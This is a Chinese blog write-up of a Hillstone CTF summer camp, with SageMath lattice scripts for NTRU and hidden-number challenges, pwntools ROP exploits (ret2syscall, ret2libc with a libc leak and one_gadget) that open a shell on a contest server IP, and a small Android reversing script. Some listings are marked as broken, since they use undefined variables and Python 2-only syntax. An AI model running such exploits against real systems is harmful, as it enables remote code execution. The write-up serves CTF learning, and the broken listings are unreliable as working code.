第三届山石网科夏令营

写在前面

下班之余来打一场炸鱼赛(主要心水小礼品哈哈哈)第一次摸到了第一,我也是网络安全大赛冠军🥵

md 蚌埠住了 冬令营还有保温杯啥的呢!这次居然就给我一本从0到1😅原地送给新生当纪念品了。

Crypto

babyNTRU

用格基规约(LLL)求 f 和 g

# SageMath script: vector, matrix, ZZ and inverse_mod are Sage built-ins, not plain Python.
# Values copied from the challenge; presumably p is the modulus, h the public key and
# c the ciphertext -- TODO confirm against the task source, which is not shown here.
p = 18265166690888475568508205788351723108492598063556694453866020018612082716314197018581664220266891343266826262103380794092636040577744226926080805739120171556812778934479727248098841525477772831490126199548545786503110837372880363428957764884329593924744941695642013585909156506088780643030023164855973833306872727463131996134184118614172430586758877233701077685751718260071836310060281140572946121079034501926660471152233585368113925178752435191910762241019003537704885083238106369534830393975302288404167836930602217985985847446070323598776341522649183248452794742376328444827351843724799192817079741161233112260479
h = 4967224096990794383219394548021661512726675694147838134779085870532422860903557980609209611713600051085944165443541629919867486254693404349210710383848787111293470866844887628407505277639836299797939984616893146647351591326606770521678401285613589626410018479980831585926061303904550146343466643582612670862834763887770328979710431031177418547347283523083258882829675470842927115407426622663316454822399636240738287665733629112976904877165355516610469901309760380900426025418466453719738514032928207738877975591007250792160137047114036933809472387873650910438263376962726381797927297555569681381513766206991560665841
c = 16817585342429374146630376920213715475053842668013412994500648477443919828494694587495599063908719008851497141935769861968183626958443589329598781614352147198572062882796132537628308726395654751145080742405050157500585726017502230322869060570158864938641538722583753556090927664838782228764769369834459631417465435803556700281096974029668813698732758153249834904501478272838991307791205987117636747526652824803482977910064904853019629040285700901775083075557874528402638028712625642698991805017963162010854671654728900722088963013805447853328852730983161366447618298248888612010461342887166024478519281752219951330472

# NOTE(review): `bits` is not defined anywhere in this listing; it has to be taken
# from the challenge source before this line can run.
# K weights the second coordinate of both basis rows and is divided back out of g below
# (presumably to balance the sizes of the two coordinates of the short vector).
K=2**(bits//2-1)
# Rows (1, h*K) and (0, p*K) form a 2x2 integer lattice basis.
v1 = vector(ZZ, [1, h*K])
v2 = vector(ZZ, [0, p*K])
m = matrix([v1, v2])
# Row index 1 of the reduced basis is taken as (f, g*K). Which reduced row holds the
# wanted pair, and its sign, is not checked here.
# That a 2-dimensional reduction is enough suggests the private pair is short relative
# to p; parameters of that shape give no protection for the private key.
f, g = m.LLL()[1]
g = g//K  # undo the K scaling on the second coordinate
#print(f,g)

# NOTE(review): `a` is computed but never used below.
a = f * c % p % g
# NOTE(review): `q` is not defined in this listing. The line above reduces modulo p,
# so this was presumably meant to be `% p` -- confirm. `m` is rebound here from the
# basis matrix to the recovered integer.
m = ZZ(c * f % q) * inverse_mod(f, g) % g
# bytes.fromhex needs an even number of hex digits; hex(m)[2:] is not padded.
print(bytes.fromhex(hex(m)[2:]))

#HSNCTF{d148fc5f-a646-4e60-a739-0bd0be98acd4}

babyHNP

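# SageMath script (matrix, block_matrix, ZZ and inverse_mod are Sage built-ins).
# q is the modulus; A and b are the five sample pairs given by the challenge.
# Every listed b value is below 2**128 while q is far larger, i.e. each sample
# exposes only part of a value modulo q -- the setting lattice reduction handles.
from Crypto.Util.number import long_to_bytes

q = 11617715374360202288596693614790746639041280065515420354170463717765818460765992548652144591072405216278802974122732716944329876299701631478958721643071613
A = [11205052163260879279779370027300388478563443748738386851258833175732815177918017923156408522968360233660245388669805196022826655093066229550671451036244177, 4587207419689873871671379475501060352361231709208665709260842495737444139113663532344038909684079685643293993271298355108298467058894209863221986043222103, 10892919356115964033441271848254373740150765391546241788365946905744103719741126554964746464277556730869654695377121263714138165633966013875792234902620232, 10388792144961373833428258161261768867774084238986429927755268743714106636512322654152268221431850066914109192294030406670197964112088034757687400251674294, 11168854651301071762033749829324982832429309270098022559190141243813683288587800229160507152432884446347484607384244984898130514154822876542001332189154040]
b = [206397678313339208910331992242857106765, 248314924649425376092667318144109655550, 116605977425896048557273717492096177262, 130883156720507560420446459921008261211, 254134740809858803078213400623952076908]

# Divide both sides of every sample by 2**128 modulo q (the inverse is computed once).
inv_shift = inverse_mod(2**128, q)
a = [ZZ(i * inv_shift % q) for i in A]
b = [ZZ(i * inv_shift % q) for i in b]

# Use sample 0 to eliminate the unknown from the remaining n samples.
n = 4
L0 = matrix(ZZ, 1, n)
L1 = matrix(ZZ, 1, n)
_a0 = inverse_mod(a[0], q)  # loop-invariant, so computed once
for i in range(n):
    L0[0, i] = ZZ(a[i+1] * _a0 % q)
    L1[0, i] = ZZ((b[0]*a[i+1] - b[i+1]*a[0]) * _a0 % q)

# 6x6 basis: one row per coefficient vector plus q on the diagonal of the sample
# columns (the scalar ZZ(q) in a square block position is expanded by block_matrix).
L = block_matrix([
    [1, L0, 0],
    [0, L1, ZZ(q)],
    [0, ZZ(q), 0]
]).LLL()

# Bit lengths of every reduced row, printed as a manual sanity check on the output.
for row in L:
    print([_.nbits() for _ in row])

# The first entry of the LAST reduced row is taken as the small term of sample 0.
# This depends on how LLL orders the rows; it is not verified programmatically.
e0 = abs(L[-1][0])
# Solve a[0]*m = b[0] + e0 (mod q) for m.
m = ZZ((b[0] + e0) * inverse_mod(a[0], q) % q)
print(long_to_bytes(int(m)))
# HSNCTF{d05dd7e4-9ee0-4ce1-b358-a4e5209555df}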

Pwn

ret2syscall

from pwn import *
from ctypes import *
import os
import base64
# pwntools configuration: verbose logging, little-endian amd64 target, and a tmux
# split as the terminal pwntools opens for an attached debugger.
context.log_level = 'debug'
context.endian = 'little'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
# Short aliases for the tube methods of the global `sh`. `sh` is looked up when an
# alias is called, so they act on whatever `sh` is bound to at that moment.
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
rl = lambda s = False : sh.recvline(s)
ti = lambda : sh.interactive()

# NOTE(review): the local process is spawned and its handle is replaced on the next
# line by the remote tube, so the local child is never used or closed in this script.
sh = process('./pwn')
sh = remote('58.240.236.231', 49003)
# Hard-coded absolute addresses inside the target binary. The names suggest a
# `syscall` instruction and one register-loading gadget each; that cannot be
# verified from this listing.
# Fixed addresses only hold when the binary is mapped at a fixed base, so the target
# is presumably built without PIE.
syscall = 0x0000000000400741
pop_rdi = 0x000000000040072b
pop_rsi = 0x0000000000400735
pop_rdx = 0x000000000040073f
pop_rax = 0x0000000000400721

# Chain contents: rax = 59 (execve on x86-64 Linux), rdi = 0x601048, rsi = 0, rdx = 0,
# then the syscall address.
# 0x601048 presumably points at a "/bin/sh" string in the binary's data -- TODO confirm.
rop = p64(pop_rax) + p64(59)
rop += p64(pop_rdi) + p64(0x0000000000601048)
rop += p64(pop_rsi) + p64(0)
rop += p64(pop_rdx) + p64(0)
rop += p64(syscall)

# 0x48 filler bytes precede the chain, so the saved return address presumably sits
# 0x48 bytes past the start of the input buffer with no stack canary in between;
# a canary or a PIE build would each invalidate this input as written.
# NOTE(review): 'a'*0x48 + rop concatenates str with the p64() result, which only
# works on Python 2, where p64 returns str.
sla('input:', 'a'*0x48 + rop)

ti()

ret2libc

from pwn import *
from ctypes import *
import os
import base64
# pwntools configuration: verbose logging, little-endian amd64 target, and a tmux
# split as the terminal pwntools opens for an attached debugger.
context.log_level = 'debug'
context.endian = 'little'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
# Short aliases for the tube methods of the global `sh`. `sh` is looked up when an
# alias is called, so they act on whatever `sh` is bound to at that moment.
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
rl = lambda s = False : sh.recvline(s)
ti = lambda : sh.interactive()

# NOTE(review): the local process handle is replaced two lines below by the remote
# tube, so the local child is never used or closed in this script.
sh = process('./pwn')
# Local copy of glibc 2.23-0ubuntu11.3, used only for symbol offsets. The offsets are
# valid only if the remote service runs this exact libc build.
libc = ELF('/home/ccc/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
sh = remote('58.240.236.231', 49002)
# Hard-coded absolute addresses inside the target binary (presumably a non-PIE build).
# pop_rsi2 is defined but never used below.
pop_rdi = 0x0000000000400783
pop_rsi2 = 0x0000000000400781
# NOTE(review): this literal has 15 hex digits instead of 16; the value is still 0x4006FD.
main = 0x0000000004006FD
# Stage 1: 0xd8 filler bytes, then pop_rdi with argument 0x601018, a call target at
# 0x400520, and a return to `main` so the prompt is shown a second time.
# Since the received value is rebased with libc.sym['puts'] below, 0x601018 is
# presumably the GOT slot of puts and 0x400520 presumably puts@plt -- TODO confirm.
leak = 'a'*0xd8 + p64(pop_rdi) + p64(0x0000000000601018) + p64(0x0000000000400520) + p64(main)
sla('name:', leak)

# Read up to the first 0x7f byte, keep the last 6 bytes, zero-extend to 8 and
# subtract the puts offset to get the libc load address.
# One leaked libc pointer is enough to undo ASLR for the whole library.
libc_base = u64(ru('\x7f')[-6:].ljust(8, '\0')) - libc.sym['puts']
# Python 2 print statement; this script does not run on Python 3 as written.
print hex(libc_base)
# 0xf1247 is the last offset in the listing kept in the string below.
og = libc_base + 0xf1247
# The bare triple-quoted string that follows is an expression statement with no
# effect; it is used as a block comment holding candidate offsets and their
# constraints. The constraint of its last entry is missing from this listing.
'''

0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
'''
# Stage 2: same 0xd8 filler, with the return address replaced by `og`.
# NOTE(review): str + p64() concatenation, like the print above, is Python 2 only.
payload = 'a'*0xd8 + p64(og)
sla('name:', payload)
ti()

Reverse

HSAndroid1

还以为和冬令营一模一样的题,结果看错了对象。上面的混淆运算才是flag

chatGPT写个脚本完事。

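# Replays the app's character-swap routine on the constant 32-character hex string
# and prints the result, which is the flag body.
# The pasted listing had lost its indentation; the nesting below (inner j-loop inside
# the i-loop, followed by the i-based swap) is the one that reproduces the flag
# recorded at the bottom.
charArr = list("0db530c0e9752357b1ae4cf7ea8331ae")

for i in range(14, 0, -2):
    # Three adjacent swaps (12<->8, 8<->4, 4<->0) rotate the characters at
    # indices 0, 4, 8, 12 by one slot.
    for j in range(12, 0, -4):
        charArr[j], charArr[j - 4] = charArr[j - 4], charArr[j]

    # Then swap the two characters just below index i.
    charArr[i - 1], charArr[i - 2] = charArr[i - 2], charArr[i - 1]

original_string = "".join(charArr)
print("Original String:", original_string)

#hsnctf{d35b300c92570e57b1ae4cf7ea8331ae}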

Misc

签到题

这个没什么好说的。

easyusb

板子题。注意有 [CAPS],所以解压密码为全大写;解开压缩包就是 flag。

Web

三个原题,一个不咋会web的人拿了三个前三血

primitive

今年冬令营一模一样的题 参考我自己的博客

https://g1at.github.io/2023/02/06/2023%E5%B1%B1%E7%9F%B3%E5%86%AC%E4%BB%A4%E8%90%A5/#Primitive-php

git

[BJDCTF2020]原题,你猜我怎么找到的,Google识图😂

https://www.jianshu.com/p/7092f56dcbbc

uns

CTFshow原题 唯一变化就是admin.php改成了session.php

https://blog.csdn.net/Kracxi/article/details/122885954


第三届山石网科夏令营
https://g1at.github.io/2023/08/21/第三届山石网科暑假CTF训练营结营赛/
作者
g0at
发布于
2023年8月21日